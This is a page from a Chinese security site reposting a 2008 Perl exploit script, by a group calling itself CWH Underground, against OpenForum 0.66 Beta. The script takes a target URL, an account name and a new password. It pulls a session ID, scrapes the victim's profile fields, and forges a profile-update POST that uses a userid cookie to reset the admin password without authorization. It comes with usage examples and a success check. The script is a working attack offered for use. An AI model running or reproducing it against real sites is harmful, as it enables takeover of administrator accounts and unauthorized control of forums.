首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenForum 0.66 Beta Remote Reset Admin Password Exploit
来源:vfocus.net 作者:vfocus 发布时间:2008-12-01  
#!/usr/bin/perl -w
#========================================================
#OpenForum 0.66 Beta Remote Reset Admin Password Exploit
#========================================================
#
#  ,--^----------,--------,-----,-------^--,
#  |  |||||||||   `--------'    |	   O	  .. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#   `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /           
#  / XXXXXX /
# (________(             
#  `------'
#
#AUTHOR : CWH Underground
#DATE : 29 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : OpenForum
#VERSION : 0.66 Beta
#DOWNLOAD : http://downloads.sourceforge.net/openforum/openforum066.zip
######################################################
#######################################################################################
#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us,
#######################################################################################

use LWP;
use HTTP::Request;
use HTTP::Request::Common;

print "\n==================================================\n";
print " Openforum 0.66 beta Remote Reset Admin Password exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==================================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";

if ($#ARGV ne 2) {
	print "Usage: ./openforum.pl <url-to-index-page> <user account> <new password>\n";
	print "Ex. ./openforum.pl http://www.target.com/openforum/index.php admin cwhpass\n";
	exit();
}

$url = $ARGV[0];
$user = $ARGV[1];
$newpass = $ARGV[2];

if ($url !~ /^http:\/\//) {
	$url = "http://".$url;
}

print "[+] Target url: ".$url."\n\n";

$req = HTTP::Request->new (GET => $url);
$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
$req->header (Accept_Language => 'en-us,en;q=0.5');

$ua = LWP::UserAgent->new;
$response = $ua->request ($req);

if ($response->code ne 200) {
	print "Error: Could not request for index page\n";
	exit ();
}

$header = $response->headers->as_string;

($sessid) = $header =~ /sessid=(.+)\n/;
print ":: Retreive session id ::\n";
print "[+] ".$sessid."\n\n";

$url =~ s/index\.php$/profile.php?user=$user/;

#print $url;



$req = HTTP::Request->new (GET => $url);
$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
$req->header (Accept_Language => 'en-us,en;q=0.5');
$req->header (Cookie => 'sessid='.$sessid.'; userid='.$user);

$response = $ua->request ($req);
if ($response->code ne 200) {
	print "Error: Could not request for ".$user."'s profile page\n";
	exit ();
}

$content = $response->content;
$update = "1";
$adminaction = "";
($email) = $content =~ /\"email\" value=\"(.*?)\"/;
($signature) = $content =~ /\"signature\">(.*?)<\/textarea>/;
$day = "";
$month = "";
$year = "";
($website) = $content =~ /\"website\" value=\"(.*?)\"/;
($name) = $content =~ /\"name\" value=\"(.*?)\"/;
($phone) = $content =~ /\"phone\" value=\"(.*?)\"/;
($city) = $content =~ /\"city\" value=\"(.*?)\"/;
($location) = $content =~ /\"location\" value=\"(.*?)\"/;
$sytle = "";
$submit = "Update!";


print ":: Update new password ::\n\n";
$url =~ s/\?user=admin//;


$response = $ua->request (POST $url,
		User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18',
		Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
		Accept_Language => 'en-us,en;q=0.5',
		Cookie => 'sessid='.$sessid.'; userid='.$user,
		Content_Type => 'form-data',
		Content => [update => $update, user => $user, adminaction => '', email => $email, signature => $signature, website => $website, name => $name,
				phone => $phone, city => $city, location => $location, password => $newpass, submit => $submit]
);

if ($response->code ne 200) {
	print "Error: Could not request for profile page\n";
	exit ();
}

$content = $response->content;

if ($content =~ /<br>updated<br><table width=\"100%\">/) {
	print "[+] Exploit Success\n";
	print "[+] New admin's password: ".$newpass."\n";
}
else
{
	print "[+] Exploit Failed\n";
}

# [2008-11-29]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Active Bids 3.5 (ItemID) Blind
·ASPThai.NET Forum 8.5 Remote D
·Active Price Comparison v4 (Pr
·Active Web Helpdesk v 2 (Auth
·Active Web Mail v 4 Blind SQL
·Lito Lite CMS (cate.php cid) R
·ActiveVotes 2.2 (AccountID) Bl
·Active Test 2.1 (QuizID) Blind
·OraMon 2.0.1 Remote Config Fil
·Itunes 8.0.2.20/Quicktime 7.5.
·CMS Made Simple 1.4.1 Local Fi
·Cain & Abel 4.9.23 (rdp file)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved